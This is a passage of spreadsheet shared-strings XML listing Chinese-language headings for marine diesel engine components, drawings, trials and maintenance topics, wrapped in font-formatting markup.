        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>柴油机速度</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滑油及冷却水系统</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸套水系统图</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>中央冷却</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>压缩空气系统图</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>涡轮增压器最大力和力矩</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>废气系统数据</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机舱</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>部件拆卸高度</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>增压器吊梁</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>底座</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>环氧垫块信息</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>底座环氧锲块</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>环氧垫块计算</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>侧锲块安装</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>凸轮侧侧锲块衬垫</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>顶撑</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>顶撑布置</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>顶撑数据</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>顶部支撑摩擦垫片</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>试航</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>液体密封材料生产建议</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>码头试验和试航</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>码头试车</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>&amp;</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>试航</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>码头动车（不带螺旋浆）</t>
    </r>
  </si>
  <si>
    <r>
      <t>MC</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>冲洗程序</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>外形图</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机舱工具板</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>外形尺寸</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主要工具</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>外形图看图步骤</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>锁紧钢丝安装</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带法兰轴</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气阀下部</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气阀上部</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>腰型法兰</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气缸</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>平垫</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>安全扶手</t>
    </r>
  </si>
  <si>
    <r>
      <t>ALPHA</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>注油器</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>液压模块</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>套筒</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>感应传感器</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>管状支撑</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>薄膜式蓄压器</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>液压块</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>型板</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>转速传感器接线箱</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>补充清单</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主轴瓦侧边</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>隔离阀</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>减震支撑</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>压差传感器</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>检验信息号</t>
    </r>
  </si>
  <si>
    <r>
      <t>K90GF</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机型剖面图</t>
    </r>
  </si>
  <si>
    <r>
      <t>K80GF</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机型剖面图</t>
    </r>
  </si>
  <si>
    <r>
      <t>L55GF</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机型剖面图</t>
    </r>
  </si>
  <si>
    <r>
      <t>K45GF</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机型剖面图</t>
    </r>
  </si>
  <si>
    <r>
      <t>L67GF</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机型剖面图</t>
    </r>
  </si>
  <si>
    <r>
      <t>K84+84VT2</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机型剖面图</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主要尺寸</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>顶部部件号</t>
    </r>
  </si>
  <si>
    <r>
      <t>CHR.HAVN</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>测试机</t>
    </r>
  </si>
  <si>
    <r>
      <t>TEGLHOLMEN</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>测试机</t>
    </r>
  </si>
  <si>
    <r>
      <t>TEGLHOLMEN</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>试验中心</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>图解</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>双燃料</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>维修报告</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>超声波检查质量控制</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>分成主要部分</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>密封垫片</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机座</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>/</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机架</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>出口</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>测量表</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轴瓦拆装工具</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机座内油位</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机架</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>后部端部机架总成</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>贯穿螺栓变形诊断</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>十字头导板液压拉伸器</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>维修</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸体空气进口</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>冷却水套外形</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸体外形</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸套外形</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸套磨损测量</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>模板</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气缸套</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>检查报告</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>启动阀衬套组件</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>测试机缸盖</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸盖外形</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸盖模板</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>焊接曲轴超声波检查</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>认可图</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>法兰夹箍</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>曲拐质量控制</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>+</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>生产规范</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>包装</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>运动部件重量数据</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>进油口与出油口</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>连杆液压拉伸器</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>安全夹箍</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>填料函导板</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
